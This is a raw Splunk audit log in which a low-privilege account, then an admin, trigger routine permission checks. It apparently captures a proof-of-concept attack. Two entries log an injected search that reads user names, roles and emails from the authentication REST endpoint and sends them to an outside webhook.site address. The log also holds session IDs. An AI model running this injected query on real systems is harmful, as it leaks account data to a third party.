Audit:[timestamp=10-06-2022 17:49:22.439, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:49:22.438, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:49:22.298, user=admin, action=edit_telemetry_settings, info=granted object="general" operation=list] Audit:[timestamp=10-06-2022 17:49:22.110, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.110, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.110, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.110, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.109, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.109, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.109, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.109, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.109, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.109, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.108, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.106, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.105, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.105, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.104, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:49:22.104, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:49:21.661, user=admin, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:49:21.039, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:49:21.038, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:49:21.030, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="user"] Audit:[timestamp=10-06-2022 17:49:20.739, user=admin, action=login attempt, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188" method=Splunk" session=47dba4d5a0c5ab0b792ca53ee7ac6746] Audit:[timestamp=10-06-2022 17:48:50.346, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="user"] Audit:[timestamp=10-06-2022 17:48:50.106, user=user, action=logout, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188 session=355060c8a375361b976ab6a6b757504a] Audit:[timestamp=10-06-2022 17:48:47.142, user=user, action=search, info=granted REST: /search/jobs/1665078496.7/control] Audit:[timestamp=10-06-2022 17:48:36.304, user=user, action=search, info=completed, search_id='1665078496.7', has_error_warn=false, fully_completed_search=true, total_run_time=0.05, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665078496, api_et=1664989200.000000000, api_lt=1665078496.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664989200.000000000, search_lt=1665078496.000000000, is_realtime=0, savedsearch_name="", search_startup_time="81", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_user_073ea77601ebf93a", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='user', search='| mstats avg('fake') WHERE "index\"=eee [| rest /services/authentication/users | table realname, title, roles, email | sendalert webhook param.url=https://webhook.site/62ffc09d-d887-4d9b-8c9a-74ccb1b4d15b] \"demo"=qwe'] Audit:[timestamp=10-06-2022 17:48:33.540, user=user, action=select_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:48:33.539, user=user, action=search, info=granted REST: /search/jobs/1665078496.7] Audit:[timestamp=10-06-2022 17:48:33.403, user=user, action=edit_user, info=denied object="user" operation=edit] Audit:[timestamp=10-06-2022 17:48:33.402, user=user, action=edit_user, info=denied object="user" operation=list] Audit:[timestamp=10-06-2022 17:48:32.866, user=user, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:48:32.665, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:48:32.665, user=user, action=list_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.665, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.665, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.665, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_tokens_own, info=granted ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_tokens_own, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_sourcetypes, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_health_subset, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_health, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=restart_splunkd, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=list_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.664, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:48:32.663, user=user, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:48:32.149, user=user, action=search, info=granted REST: /search/jobs/1665078496.7/control] Audit:[timestamp=10-06-2022 17:48:17.359, user=user, action=select_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:48:17.358, user=user, action=search, info=granted REST: /search/jobs/1665078496.7] Audit:[timestamp=10-06-2022 17:48:17.348, user=user, action=search, info=granted REST: /search/parser] Audit:[timestamp=10-06-2022 17:48:17.144, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:48:17.001, user=user, action=select_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:48:17.001, user=user, action=search, info=granted REST: /search/jobs/1665078496.7] Audit:[timestamp=10-06-2022 17:48:16.840, user=user, action=quota,search_id=1665078496.7, elapsed_ms=1, cache_size=1] Audit:[timestamp=10-06-2022 17:48:16.840, user=user, action=search, info=granted , search_id='1665078496.7', search='| mstats avg('fake') WHERE "index\"=eee [| rest /services/authentication/users | table realname, title, roles, email | sendalert webhook param.url=https://webhook.site/62ffc09d-d887-4d9b-8c9a-74ccb1b4d15b] \"demo"=qwe', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 17:00:00 2022', apiEndTime='Thu Oct 6 17:48:16 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 17:48:16.840, user=user, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:48:16.809, user=user, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 17:48:16.662, user=user, action=fsh_search, info=denied ] Audit:[timestamp=10-06-2022 17:48:16.662, user=user, action=fsh_manage, info=denied ] Audit:[timestamp=10-06-2022 17:48:16.662, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:47:55.542, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:47:55.406, user=user, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:47:55.374, user=user, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 17:47:55.227, user=user, action=fsh_search, info=denied ] Audit:[timestamp=10-06-2022 17:47:55.227, user=user, action=fsh_manage, info=denied ] Audit:[timestamp=10-06-2022 17:47:55.227, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:47:55.086, user=user, action=search, info=cancel, search_id='rt_md_1665078394.6'] Audit:[timestamp=10-06-2022 17:47:55.085, user=user, action=search, info=granted REST: /search/jobs/rt_md_1665078394.6] Audit:[timestamp=10-06-2022 17:46:36.303, user=user, action=search, info=completed, search_id='rt_md_1665078394.6', has_error_warn=false, fully_completed_search=true, total_run_time=0.02, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665078394, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=1, savedsearch_name="", search_startup_time="52", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_user_d79d8decd779a2d3", app="search", provenance="UI:Search", mode="RT", is_proxied=false, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='user', search='| metadata type=sourcetypes | search totalCount > 0'] Audit:[timestamp=10-06-2022 17:46:35.282, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:46:35.275, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:46:34.797, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:46:34.791, user=user, action=select_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.790, user=user, action=search, info=granted REST: /search/jobs/rt_md_1665078394.6] Audit:[timestamp=10-06-2022 17:46:34.699, user=user, action=rtsearch, info=denied REST: /streams/rtsearch/0] Audit:[timestamp=10-06-2022 17:46:34.648, user=user, action=rest_properties_get, info=granted REST: /static/appLogo_2x.png] Audit:[timestamp=10-06-2022 17:46:34.641, user=user, action=search, info=granted , search_id='rt_md_1665078394.6', search='| metadata type=sourcetypes | search totalCount > 0', autojoin='1', buckets=300, ttl=600, max_count=100000, maxtime=0, enable_lookups='1', extra_fields='*', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="RT"] Audit:[timestamp=10-06-2022 17:46:34.640, user=user, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:46:34.478, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:46:34.310, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.310, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.182, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.182, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_telemetry_settings, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_tokens_own, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_tokens_own, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:46:34.181, user=user, action=edit_sourcetypes, info=denied ] Audit:[timestamp=10-06-2022 